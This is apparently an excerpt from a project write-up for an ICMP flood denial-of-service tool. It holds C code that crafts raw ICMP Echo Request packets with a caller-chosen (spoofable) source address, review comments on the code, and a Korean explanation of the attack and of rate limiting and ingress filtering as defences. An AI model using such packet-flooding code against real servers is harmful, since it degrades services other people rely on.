Wireshark Capture
210301_icmp.pcapng

Code Implementation
/*
 * Builds one ICMP Echo Request inside an IPv4 header and hands it to
 * send_packet(). Excerpt only: icmp_src_ip, icmp_dest_ip, icmp_produced, sock
 * and g_icmp_now_port are defined outside this listing, and the enclosing
 * loop (if any) is not shown.
 *
 * Traffic produced by this code has a recognisable shape: the ICMP message is
 * always exactly sizeof(struct icmp) bytes, everything after the header fields
 * set below is zero, and the identifier is the same for every packet sent by
 * one process.
 */
struct icmp *p;
/* Scratch space for a single ICMP message, zero-filled before use. */
/* NOTE(review): a char array carries no alignment guarantee for struct icmp;
 * declaring a `struct icmp` object directly would avoid the cast below. */
char buffer[sizeof(struct icmp)];
memset(buffer, 0x00, sizeof(struct icmp));
struct iphdr ipv4_h;
/* The ipv4_* helpers are project functions not shown here; presumably each
 * returns a copy of the header with one field updated - confirm. */
ipv4_h = prepare_empty_ipv4();
ipv4_h = ipv4_set_protocol(ipv4_h, IPPROTO_ICMP);
/* The source address comes from the icmp_src_ip string rather than from the
 * sending interface, so it is whatever the caller supplied. inet_addr()
 * returns INADDR_NONE on a malformed string and that result is not checked. */
ipv4_h = ipv4_set_saddr(ipv4_h, inet_addr(icmp_src_ip));
/* Disabled: would advance icmp_src_ip by one for the next packet. */
//next_ip_addr(icmp_src_ip, 1);
/* Same unchecked inet_addr() conversion for the destination address. */
ipv4_h = ipv4_set_daddr(ipv4_h, inet_addr(icmp_dest_ip));
p = (struct icmp*) buffer;
p->icmp_type = ICMP_ECHO;   /* Echo Request */
p->icmp_code = 0;
p->icmp_cksum = 0;          /* must be zero while the checksum is computed */
/* Sequence number in network byte order; icmp_produced is presumably a
 * running count of packets built so far - confirm. */
p->icmp_seq = htons(icmp_produced);
/* NOTE(review): the identifier field is 16 bits wide, so the pid is truncated,
 * and unlike icmp_seq it is stored without htons(). */
p->icmp_id = getpid();
/* Checksum over the whole struct, taken after every other field is set.
 * in_cksum() is not shown; presumably the Internet checksum - confirm. */
p->icmp_cksum = in_cksum((u_short*) p, sizeof(struct icmp));
/* Presumably adds the ICMP length to the IPv4 total length - confirm. */
ipv4_h = ipv4_add_size(ipv4_h, sizeof(struct icmp));
/* NOTE(review): ownership of the buffer returned by packet_assemble() is not
 * visible here and the excerpt never releases it or checks it for NULL;
 * confirm who frees it, otherwise each packet built leaks one buffer. */
char *packet = packet_assemble(ipv4_h, p, sizeof(struct icmp));
/* NOTE(review): ICMP has no port numbers; the meaning of g_icmp_now_port for
 * this protocol depends on send_packet(), which is not shown. */
send_packet(sock, ipv4_h, packet, g_icmp_now_port);
How it works
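- ICMP Echo Request 패킷(흔히 ping)을 대량으로 발생시켜 서버가 각 request를 처리하는 데 자원을 할당하게 만들고, 그 결과 서버의 처리 능력을 저하시키는 공격 방법이다. 방어 측에서는 ICMP 속도 제한(rate limiting)과 출발지 주소 검증(ingress filtering)으로 영향을 줄일 수 있다.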